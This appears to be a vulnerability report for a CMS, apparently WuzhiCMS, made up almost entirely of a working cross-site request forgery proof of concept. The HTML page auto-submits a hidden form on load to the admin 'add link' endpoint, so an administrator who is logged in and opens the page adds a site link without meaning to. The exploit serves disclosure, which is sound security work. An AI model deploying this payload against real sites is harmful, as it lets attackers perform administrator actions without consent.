Open
Description
After the administrator logs in, open this page
poc testr_csrf.html //Add a friendship link
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='form[kid]' value='1' />";
fields += "<input type='hidden' name='form[sitename]' value='test_csrf' />";
fields += "<input type='hidden' name='form[url]' value='www.google.cn' />";
fields += "<input type='hidden' name='form[logo]' value='' />";
fields += "<input type='hidden' name='form[remark]' value='test_csrf' />";
var url = "http://127.0.0.1/index.php?m=link&f=index&v=add&&_su=wuzhicms&_menuid=34&_submenuid=104&submit=提交";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
Metadata
Metadata
Assignees
Labels
No labels